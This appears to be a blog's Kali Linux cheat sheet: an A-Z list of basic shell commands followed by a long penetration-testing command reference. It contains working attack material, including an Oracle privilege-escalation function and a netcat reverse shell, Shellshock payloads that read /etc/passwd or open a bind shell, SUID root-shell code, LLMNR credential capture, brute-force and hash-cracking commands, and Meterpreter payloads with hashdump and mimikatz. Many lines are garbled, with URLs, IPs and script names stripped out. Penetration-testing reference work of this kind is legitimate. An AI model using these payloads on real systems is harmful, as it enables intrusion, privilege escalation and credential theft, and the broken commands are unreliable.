Wednesday, September 19Care to be aware

The Ultimate Kali Linux Cheat Sheet

Kali Linux commands cheat sheet. All basic commands from A to Z in Kali Linux has been listed below.


  • apropos : Search Help manual pages (man -k)
  • apt-get : Search for and install software packages (Debian/Ubuntu)
  • aptitude : Search for and install software packages (Debian/Ubuntu)
  • aspell : Spell Checker
  • awk : Find and Replace text, database sort/validate/index


  • basename : Strip directory and suffix from filenames
  • bash : GNU Bourne-Again SHell
  • bc : Arbitrary precision calculator language
  • bg : Send to background
  • break : Exit from a loop
  • builtin : Run a shell builtin
  • bzip2 : Compress or decompress named file(s)


  • cal : Display a calendar
  • case : Conditionally perform a command
  • cat : Concatenate and print (display) the content of files
  • cd : Change Directory
  • cfdisk : Partition table manipulator for Linux
  • chgrp : Change group ownership
  • chmod : Change access permissions
  • chown : Change file owner and group
  • chroot : Run a command with a different root directory
  • chkconfig : System services (runlevel)
  • cksum : Print CRC checksum and byte counts
  • clear : Clear terminal screen
  • cmp : Compare two files
  • comm : Compare two sorted files line by line
  • command : Run a command – ignoring shell functions •
  • continue : Resume the next iteration of a loop •
  • cp : Copy one or more files to another location
  • cron : Daemon to execute scheduled commands
  • crontab : Schedule a command to run at a later time
  • csplit : Split a file into context-determined pieces
  • cut : Divide a file into several parts


  • date : Display or change the date & time
  • dc : Desk Calculator
  • dd : Convert and copy a file, write disk headers, boot records
  • ddrescue : Data recovery tool
  • declare : Declare variables and give them attributes •
  • df : Display free disk space
  • diff : Display the differences between two files
  • diff3 : Show differences among three files
  • dig : DNS lookup
  • dir : Briefly list directory contents
  • dircolors : Colour setup for `ls’
  • dirname : Convert a full pathname to just a path
  • dirs : Display list of remembered directories
  • dmesg : Print kernel & driver messages
  • du : Estimate file space usage


  • echo : Display message on screen •
  • egrep : Search file(s) for lines that match an extended expression
  • eject : Eject removable media
  • enable : Enable and disable builtin shell commands •
  • env : Environment variables
  • ethtool : Ethernet card settings
  • eval : Evaluate several commands/arguments
  • exec : Execute a command
  • exit : Exit the shell
  • expect : Automate arbitrary applications accessed over a terminal
  • expand : Convert tabs to spaces
  • export : Set an environment variable
  • expr : Evaluate expressions
Related  The Linux Command Line eBook Free Download


  • false : Do nothing, unsuccessfully
  • fdformat : Low-level format a floppy disk
  • fdisk : Partition table manipulator for Linux
  • fg : Send job to foreground
  • fgrep : Search file(s) for lines that match a fixed string
  • file : Determine file type
  • find : Search for files that meet a desired criteria
  • fmt : Reformat paragraph text
  • fold : Wrap text to fit a specified width.
  • for : Expand words, and execute commands
  • format : Format disks or tapes
  • free : Display memory usage
  • fsck : File system consistency check and repair
  • ftp : File Transfer Protocol
  • function : Define Function Macros
  • fuser : Identify/kill the process that is accessing a file


  • gawk : Find and Replace text within file(s)
  • getopts : Parse positional parameters
  • grep : Search file(s) for lines that match a given pattern
  • groupadd : Add a user security group
  • groupdel : Delete a group
  • groupmod : Modify a group
  • groups : Print group names a user is in
  • gzip : Compress or decompress named file(s)


  • hash : Remember the full pathname of a name argument
  • head : Output the first part of file(s)
  • help : Display help for a built-in command
  • history : Command History
  • hostname : Print or set system name


  • iconv : Convert the character set of a file
  • id : Print user and group id’s
  • if : Conditionally perform a command
  • ifconfig : Configure a network interface
  • ifdown : Stop a network interface
  • ifup : Start a network interface up
  • import : Capture an X server screen and save the image to file
  • install : Copy files and set attributes


  • jobs : List active jobs
  • join : Join lines on a common field


  • kill : Stop a process from running
  • killall : Kill processes by name


  • less : Display output one screen at a time
  • let : Perform arithmetic on shell variables
  • ln : Create a symbolic link to a file
  • local : Create variables
  • locate : Find files
  • logname : Print current login name
  • logout : Exit a login shell
  • look : Display lines beginning with a given string
  • lpc : Line printer control program
  • lpr : Off line print
  • lprint : Print a file
  • lprintd : Abort a print job
  • lprintq : List the print queue
  • lprm : Remove jobs from the print queue
  • ls : List information about file(s)
  • lsof : List open files


  • make : Recompile a group of programs
  • man : Help manual
  • mkdir : Create new folder(s)
  • mkfifo : Make FIFOs (named pipes)
  • mkisofs : Create an hybrid ISO9660/JOLIET/HFS filesystem
  • mknod : Make block or character special files
  • more : Display output one screen at a time
  • mount : Mount a file system
  • mtools : Manipulate MS-DOS files
  • mtr : Network diagnostics (traceroute/ping)
  • mv : Move or rename files or directories
  • mmv : Mass Move and rename (files)
Related  C and C++ Cheat Sheet


  • netstat : Networking information
  • nice Set : the priority of a command or job
  • nl Number : lines and write files
  • nohup : Run a command immune to hangups
  • notify-send : Send desktop notifications
  • nslookup : Query Internet name servers interactively


  • open : Open a file in its default application
  • op : Operator access


  • passwd : Modify a user password
  • paste : Merge lines of files
  • pathchk : Check file name portability
  • ping : Test a network connection
  • pkill : Stop processes from running
  • popd : Restore the previous value of the current directory
  • pr : Prepare files for printing
  • printcap : Printer capability database
  • printenv : Print environment variables
  • printf : Format and print data •
  • ps : Process status
  • pushd : Save and then change the current directory
  • pwd : Print Working Directory


  • quota : Display disk usage and limits
  • quotacheck : Scan a file system for disk usage
  • quotactl : Set disk quotas


  • ram : ram disk device
  • rcp : Copy files between two machines
  • read : Read a line from standard input
  • readarray : Read from stdin into an array variable
  • readonly : Mark variables/functions as readonly
  • reboot : Reboot the system
  • rename : Rename files
  • renice : Alter priority of running processes
  • remsync : Synchronize remote files via email
  • return : Exit a shell function
  • rev : Reverse lines of a file
  • rm : Remove files
  • rmdir : Remove folder(s)
  • rsync : Remote file copy (Synchronize file trees)


  • screen : Multiplex terminal, run remote shells via ssh
  • scp : Secure copy (remote file copy)
  • sdiff : Merge two files interactively
  • sed : Stream Editor
  • select : Accept keyboard input
  • seq : Print numeric sequences
  • set: Manipulate shell variables and functions
  • sftp : Secure File Transfer Program
  • shift : Shift positional parameters
  • shopt : Shell Options
  • shutdown : Shutdown or restart linux
  • sleep : Delay for a specified time
  • slocate : Find files
  • sort : Sort text files
  • source : Run commands from a file `.’
  • split : Split a file into fixed-size pieces
  • ssh : Secure Shell client (remote login program)
  • strace : Trace system calls and signals
  • su : Substitute user identity
  • sudo : Execute a command as another user
  • sum : Print a checksum for a file
  • suspend : Suspend execution of this shell
  • symlink : Make a new name for a file
  • sync : Synchronize data on disk with memory
Related  HTML Cheat Sheet Free Download


  • tail : Output the last part of file
  • tar : Tape ARchiver
  • tee : Redirect output to multiple files
  • test : Evaluate a conditional expression
  • time : Measure Program running time
  • times : User and system times
  • touch : Change file timestamps
  • top : List processes running on the system
  • traceroute : Trace Route to Host
  • trap : Run a command when a signal is set(bourne)
  • tr : Translate, squeeze, and/or delete characters
  • true : Do nothing, successfully
  • tsort : Topological sort
  • tty : Print filename of terminal on stdin
  • type : Describe a command


  • ulimit : Limit user resources
  • umask : Users file creation mask
  • umount : Unmount a device
  • unalias : Remove an alias
  • uname : Print system information
  • unexpand : Convert spaces to tabs
  • uniq : Uniquify files
  • units : Convert units from one scale to another
  • unset : Remove variable or function names
  • unshar : Unpack shell archive scripts
  • until : Execute commands (until error)
  • uptime : Show uptime
  • useradd : Create new user account
  • userdel : Delete a user account
  • usermod : Modify user account
  • users : List users currently logged in
  • uuencode : Encode a binary file
  • uudecode : Decode a file created by uuencode


  • v : Verbosely list directory contents (`ls -l -b’)
  • vdir : Verbosely list directory contents (`ls -l -b’)
  • vi : Text Editor
  • vmstat : Report virtual memory statistics


  • wait : Wait for a process to complete
  • watch : Execute/display a program periodically
  • wc : Print byte, word, and line counts
  • whereis : Search the user’s $path, man pages and source files for a program
  • which : Search the user’s $path for a program file
  • while : Execute commands
  • who : Print all usernames currently logged in
  • whoami : Print the current user id and name (`id -un’)
  • wget : Retrieve web pages or files via HTTP, HTTPS or FTP
  • write : Send a message to another user


  • xargs : Execute utility, passing constructed argument list(s)
  • xdg-open : Open a file or URL in the user’s preferred application.


Download Cheat Sheet: Kali Linux Commands



Network Configuration

Set IP Address

ifconfig eth0 




Passive Information Gathering


WHOIS enumeration
Perform DNS IP Lookup
dig a @nameserver 
Perform MX Record Lookup
dig mx @nameserver
Perform Zone Transfer with DIG
dig axfr @nameserver

DNS Zone Transfers

nslookup -> set type=any -> ls -d Windows DNS zone transfer
dig axfr Linux DNS zone transfer


Simply Email

Use Simply Email to enumerate all the online places (github, target site etc), it works better if you use proxies or set long throttle times so google doesn’t think you’re a robot and make you fill out a Captcha.

git clone
./ -all -e TARGET-DOMAIN

Simply Email can verify the discovered email addresss after gathering.

Semi Active Information Gathering

Basic Finger Printing

Manual finger printing / banner grabbing.

nc -v 25

telnet 25

Basic versioning / finger printing via displayed banner
GET / HTTP/1.1
User-Agent: Mozilla/5.0
Referrer: meh-domain

Active Information Gathering

DNS Bruteforce


DNS Enumeration Kali – DNSRecon

root:~# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std –xml ouput.xml

Port Scanning

Nmap Commands

For more commands, see the Nmap cheat sheet (link in the menu on the right).

Basic Nmap Commands:

nmap -v -sS -A -T4 target Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p--A -T4 target As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns
--script-args=unsafe=1 192.168.1.X
Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover
ls /usr/share/nmap/scripts/* | grep ftp Search nmap scripts for keywords
Nmap UDP Scanning
nmap -sU TARGET 
UDP Protocol Scanner
git clone

Scan a file of IP addresses for all services:

./ -f ip.txt 

Scan for a specific UDP service: -p ntp -f ips.txt
Other Host Discovery

Other methods of host discovery, that don’t use nmap…

netdiscover -r Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site

Enumeration & Attacking Network Services

Tools that will spefically identify and / or enumerate network services:

SAMB / SMB / Windows Domain Enumeration

Samba Enumeration

SMB Enumeration Tools
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

Also see, nbtscan cheat sheet (right hand menu).

nbtscan Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing
Fingerprint SMB Version
smbclient -L // 
Find open SMB Shares
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445   
Enumerate SMB Users
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 
python /usr/share/doc/python-impacket-doc/examples
/ 192.168.XXX.XXX

RID Cycling: 192.168.XXX.XXX 500 50000 dict.txt

Metasploit module for RID cycling:

use auxiliary/scanner/smb/smb_lookupsid
Manual Null session testing:


net use \\TARGET\IPC$ "" /u:""


smbclient -L //
NBTScan unixwiz

Install on Kali rolling:

apt-get install nbtscan-unixwiz 
nbtscan-unixwiz -f > nbtscan

LLMNR / NBT-NS Spoofing

Steal credentials off the network.

Metasploit LLMNR / NetBIOS requests

Spoof / poison LLMNR / NetBIOS requests:


Capture the hashes:


You’ll end up with NTLMv2 hash, use john or hashcat to crack it.

Alternatively you can use responder.

git clone
python -i local-ip -I eth0
Run for the whole engagement

Run for the length of the engagement while you’re working on other attack vectors.

SNMP Enumeration

Fix SNMP output values so they are human readable:

apt-get install snmp-mibs-downloader download-mibs
echo "" > /etc/snmp/snmp.conf
snmpcheck -t 192.168.1.X -c public

snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts

SNMP enumeration

SNMPv3 Enumeration

Idenitfy SNMPv3 servers with nmap:

nmap -sV -p 161 --script=snmp-info TARGET-SUBNET

Rory McCune’s snmpwalk wrapper script helps automate the username enumeration process for SNMPv3:

apt-get install snmp snmp-mibs-downloader
Use Metasploits Wordlist

Metasploit’s wordlist (KALI path below) has common credentials for v1 & 2 of SNMP, for newer credentials check out Daniel Miessler’s SecLists project on GitHub (not the mailing list!).


R Services Enumeration

This is legacy, included for completeness.

nmap -A will perform all the rservices enumeration listed below, this section has been added for completeness or manual confirmation:

RSH Enumeration

RSH Run Commands
rsh <target> <command>
Metasploit RSH Login Scanner
rusers Show Logged in Users
rusers -al
rusers scan whole Subnet
rlogin -l <user> <target>

e.g rlogin -l root TARGET-SUBNET/24

Finger Enumeration

finger @TARGET-IP

Finger a Specific Username

finger batman@TARGET-IP 

Solaris bug that shows all logged in users:

finger 0@host  

SunOS: RPC services allow user enum:
$ rusers # users logged onto LAN

finger 'a b c d e f g h'@sunhost 


Use nmap to identify machines running rwhod (513 UDP)

TLS & SSL Testing

Test all the things on a single host and output to a .html file:

./ -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html  

Vulnerability Assessment

Install OpenVAS 8 on Kali Rolling:

apt-get update
apt-get dist-upgrade -y
apt-get install openvas

Verify openvas is running using:

netstat -tulpn

Login at – credentials are generated during openvas-setup.

Database Penetration Testing

Attacking database servers exposed on the network.


Install oscanner:

apt-get install oscanner  

Run oscanner:

oscanner -s -P 1521 

Fingerprint Oracle TNS Version

Install tnscmd10g:

apt-get install tnscmd10g

Fingerprint oracle tns:

tnscmd10g version -h TARGET
nmap --script=oracle-tns-version 

Brute force oracle user accounts

Identify default Oracle accounts:

 nmap --script=oracle-sid-brute 
 nmap --script=oracle-brute 

Run nmap scripts against Oracle TNS:

nmap -p 1521 -A TARGET

Oracle Privilege Escalation


  • Oracle needs to be exposed on the network
  • A default account is in use like scott

Quick overview of how this works:

  1. Create the function
  2. Create an index on table SYS.DUAL
  3. The index we just created executes our function SCOTT.DBA_X
  4. The function will be executed by SYS user (as that’s the user that owns the table).
  5. Create an account with DBA priveleges

In the example below the user SCOTT is used but this should be possible with another default Oracle account.

Identify default accounts within oracle db using NMAP NSE scripts:
nmap --script=oracle-sid-brute 
nmap --script=oracle-brute 

Login using the identified weak account (assuming you find one).

How to identify the current privilege level for an oracle user:
SQL> select * from session_privs; 

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid 
curren_user is 
pragma autonomous_transaction; 
execute immediate 'grant dba to user1 identified by pass1';
return 'FOO';
Oracle priv esc and obtain DBA access:

Run netcat: netcat -nvlp 443code>

SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
Run the exploit with a select query:
SQL> Select * from session_privs; 

You should have a DBA user with creds user1 and pass1.

Verify you have DBA privileges by re-running the first command again.

Remove the exploit using:
drop index exploit_1337; 
Get Oracle Reverse os-shell:
dbms_scheduler.create_job( job_name    => 'MEH1337',job_type    =>
    'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
    SYSTIMESTAMP,enabled    => FALSE,auto_drop => TRUE); 
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');


Enumeration / Discovery:


nmap -sU --script=ms-sql-info


msf > use auxiliary/scanner/mssql/mssql_ping
Use MS SQL Servers Browse For More

Try using “Browse for More” via MS SQL Server Management Studio

Bruteforce MSSQL Login

msf > use auxiliary/admin/mssql/mssql_enum

Metasploit MSSQL Shell

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp


Plink.exe Tunnel

PuTTY Link tunnel

Forward remote port to local address:

plink.exe -P 22 -l root -pw "1337" -R 445: REMOTE-IP


SSH Pivoting

ssh -D -p 22 user@pivot-target-ip

Add socks4 1010 in /etc/proxychains.conf

SSH pivoting from one network to another:

ssh -D -p 22 user1@ip-address-1

Add socks4 1010 in /etc/proxychains.conf

proxychains ssh -D -p 22 user1@ip-address-2

Add socks4 1011 in /etc/proxychains.conf

Meterpreter Pivoting

TTL Finger Printing

Windows 128
Linux 64
Solaris 255
Cisco / Network 255

IPv4 Cheat Sheets

Classful IP Ranges

E.g Class A,B,C (depreciated)

Class A IP Address Range -
Class B IP Address Range -
Class C IP Address Range -
Class D IP Address Range -
Class E IP Address Range -

IPv4 Private Address Ranges

Class A Private Address Range -
Class B Private Address Range -
Class C Private Address Range - -

IPv4 Subnet Cheat Sheet

/31 1 Host
/30 2 Hosts
/29 6 Hosts
/28 14 Hosts
/27 30 Hosts
/26 62 Hosts
/25 126 Hosts
/24 254 Hosts
/23 512 Host
/22 1022 Hosts
/21 2046 Hosts
/20 4094 Hosts
/19 8190 Hosts
/18 16382 Hosts
/17 32766 Hosts
/16 65534 Hosts
/15 131070 Hosts
/14 262142 Hosts
/13 524286 Hosts
/12 1048674 Hosts
/11 2097150 Hosts
/10 4194302 Hosts
/9 8388606 Hosts
/8 16777214 Hosts

VLAN Hopping

Using NCCGroups VLAN wrapper script for Yersina simplifies the process.

git clone
chmod 700

VPN Hacking

Identify VPN servers:

./ -p ike TARGET(s)

Scan a range for VPN servers:

./ -p ike -f ip.txt


Use IKEForce to enumerate or dictionary attack VPN servers.


pip install pyip
git clone

Perform IKE VPN enumeration with IKEForce:

./ TARGET-IP –e –w wordlists/groupnames.dic

Bruteforce IKE VPN using IKEForce:

./ TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key

IKE Aggressive Mode PSK Cracking

  1. Identify VPN Servers
  2. Enumerate with IKEForce to obtain the group ID
  3. Use ike-scan to capture the PSK hash from the IKE endpoint
  4. Use psk-crack to crack the hash
Step 1: Idenitfy IKE Servers
./ -p ike SUBNET/24
Step 2: Enumerate group name with IKEForce
./ TARGET-IP –e –w wordlists/groupnames.dic
Step 3: Use ike-scan to capture the PSK hash
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
Step 4: Use psk-crack to crack the PSK hash
psk-crack hash-file.txt

Some more advanced psk-crack options below:

psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key

PPTP Hacking

Identifying PPTP, it listens on TCP: 1723

NMAP PPTP Fingerprint:
nmap –Pn -sV -p 1723 TARGET(S)
PPTP Dictionary Attack
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst

DNS Tunneling

Tunneling data over DNS to bypass firewalls.

dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.

Attacking Machine


apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone
cd dnscat2/server
bundle install

Run dnscat2:

ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422

Target Machine:

dnscat --host <dnscat server_ip>

BOF / Exploit

Exploit Research

Find exploits for enumerated hosts / services.

searchsploit windows 2003 | grep -i local Search exploit-db for exploit, in this example windows 2003 + local esc exploit kernel <= 3 Use google to search for exploits
grep -R "W7" /usr/share/metasploit-framework
Search metasploit modules using grep – msf search sucks a bit

Searching for Exploits

Install local copy of exploit-db:

 searchsploit –u
 searchsploit apache 2.2
 searchsploit "Linux Kernel"
 searchsploit linux 2.6 | grep -i ubuntu | grep local

Compiling Windows Exploits on Kali

  wget -O mingw-get-setup.exe
  wine mingw-get-setup.exe
  select mingw32-base
  cd /root/.wine/drive_c/windows
  wget && unzip
  cd /root/.wine/drive_c/MinGW/bin
  wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  wine ability.exe  

Cross Compiling Exploits

gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)

Exploiting Common Vulnerabilities

Exploiting Shellshock

A tool to find and exploit servers vulnerable to Shellshock:

git clone
./ -H TARGET  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock run bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock reverse Shell
nc -l -p 443

Simple Local Web Servers

Python local web server command, handy for serving up shells and exploits on an attacking machine.

python -m SimpleHTTPServer 80 Run a basic http server, great for serving up shells etc
python3 -m http.server Run a basic Python3 http server, great for serving up shells etc
ruby -rwebrick -e "
(:Port => 80, :DocumentRoot => Dir.pwd).start"
Run a ruby webrick basic http server
php -S Run a basic PHP http server

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

mount /mnt/nfs Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs
Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \\win-server\share password
/user:domain\janedoe /savecred /p:no
Mount a Windows share on Windows from the command line
apt-get install smb4k -y Install smb4k on Kali, useful Linux GUI for browsing SMB shares

HTTP / HTTPS Webserver Enumeration

nikto -h Perform a nikto scan against target
dirbuster Configure via GUI, CLI input doesn’t work most of the time

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0 tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

python /usr/share/doc/python-impacket-doc/examples
/ 192.168.XXX.XXX
Enumerate users from SMB 192.168.XXX.XXX 500 50000 dict.txt RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

snmpwalk public -v1 192.168.X.XXX 1 |grep
|cut -d” “ -f4
Enmerate users from SNMP
python /usr/share/doc/python-impacket-doc/examples/ SNMP 192.168.X.XXX
Enmerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
(then grep)
Search for SNMP servers with nmap, grepable output



/usr/share/wordlists Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX ftp -V
Hydra FTP brute force

Hydra POP3 Brute Force

hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX pop3 -V
Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V Hydra SMTP brute force

Use -t to limit concurrent connections, example: -t 15

Password Cracking

John The Ripper – JTR

john --wordlist=/usr/share/wordlists/rockyou.txt hashes JTR password cracking
john --format=descrypt --wordlist
/usr/share/wordlists/rockyou.txt hash.txt
JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show JTR forced descrypt brute force cracking

Windows Penetration Testing Commands

See Windows Penetration Testing Commands.

Linux Penetration Testing Commands

See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.

Compiling Exploits

Some notes on compiling exploits.

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

process.h, string.h, winbase.h, windows.h, winsock2.h Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
sys/sockt.h, sys/types.h, unistd.h
Linux exploit code

Build Exploit GCC

Compile exploit gcc.

gcc -o exploit exploit.c Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

gcc -m32 exploit.c -o exploit Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash

int main(void){
       setresuid(0, 0, 0);

SUID C Shell for /bin/sh

int main(void){
       setresuid(0, 0, 0);

Building the SUID Shell binary

gcc -o suid suid.c  

For 32 bit:

gcc -m32 -o suid suid.c  

Reverse Shells

See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell


Spawn TTY Shell from Vi

Run shell commands from vi:


Spawn TTY Shell NMAP



Some basic Metasploit stuff, that I have found handy for reference.

Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting techniques.

Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp

set ViewOnly false

Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

upload file c:\\windows Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp Meterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmp Meterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exe Meterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -c Creates new channel with cmd shell
ps Meterpreter show processes
shell Meterpreter get shell on the target
getsystem Meterpreter attempts priviledge escalation the target
hashdump Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapi MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

use auxiliary/scanner/http/dir_scanner Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version Metasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_login Metasploit Oracle Login Module

Metasploit Powershell Modules

use exploit/multi/script/web_delivery Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

Windows Metasploit Modules for privilege escalation.

run post/windows/gather/win_privs Metasploit show privileges of current user
use post/windows/gather/credentials/gpp Metasploit grab GPP saved passwords
load mimikatz -> wdigest Metasplit load Mimikatz
run post/windows/gather/local_admin_search_enum Idenitfy other machines that the supplied domain user has administrative access to
run post/windows/gather/smart_hashdump Automated dumping of sam file, tries to esc privileges etc

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

x00 Null Byte
x08 BS
x09 TAB
x0a LF
x0d CR
x1b ESC
x20 SPC
x21 !
x23 #
x24 $
x25 %
x26 &
x27 `
x28 (
x29 )
x2a *
x2b +
x2c ,
x2e .
x2f /
x30 0
x31 1
x32 2
x33 3
x34 4
x35 5
x36 6
x37 7
x38 8
x39 9
x3a :
x3b ;
x3c <
x3d =
x3e >
x3f ?
x40 @
x41 A
x42 B
x43 C
x44 D
x45 E
x46 F
x47 G
x48 H
x49 I
x4a J
x4b K
x4c L
x4d M
x4e N
x4f O
x50 P
x51 Q
x52 R
x53 S
x54 T
x55 U
x56 V
x57 W
x58 X
x59 Y
x5a Z
x5b [
x5c \
x5d ]
x5e ^
x5f _
x60 `
x61 a
x62 b
x63 c
x64 d
x65 e
x66 f
x67 g
x68 h
x69 i
x6a j
x6b k
x6c l
x6d m
x6e n
x6f o
x70 p
x71 q
x72 r
x73 s
x74 t
x75 u
x76 v
x77 w
x78 x
x79 y
x7a z

CISCO IOS Commands

A collection of useful Cisco IOS commands.

enable Enters enable mode
conf t Short for, configure terminal
(config)# interface fa0/0 Configure FastEthernet 0/0
(config-if)# ip addr Add ip to fa0/0
(config-if)# ip addr Add ip to fa0/0
(config-if)# line vty 0 4 Configure vty line
(config-line)# login Cisco set telnet password
(config-line)# password YOUR-PASSWORD Set telnet password
# show running-config Show running config loaded in memory
# show startup-config Show sartup config
# show version show cisco IOS version
# show session display open sessions
# show ip interface Show network interfaces
# show interface e0 Show detailed interface info
# show ip route Show routes
# show access-lists Show access lists
# dir file systems Show available files
# dir all-filesystems File information
# dir /all SHow deleted files
# terminal length 0 No limit on terminal output
# copy running-config tftp Copys running config to tftp server
# copy running-config startup-config Copy startup-config to running-config


Hash Lengths

MD5 Hash Length 16 Bytes
SHA-1 Hash Length 20 Bytes
SHA-256 Hash Length 32 Bytes
SHA-512 Hash Length 64 Bytes

Hash Examples

Likely just use hash-identifier for this but here are some example hashes:

MD5 Hash Example 8743b52063cd84097a65d1633f5c74f5
MD5 $PASS:$SALT Example 01dfae6e5d4d90d9892622325959afbe:7050461
MD5 $SALT:$PASS f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
SHA1 Hash Example b89eaac7e61417341b710b727768294d0e6a277b
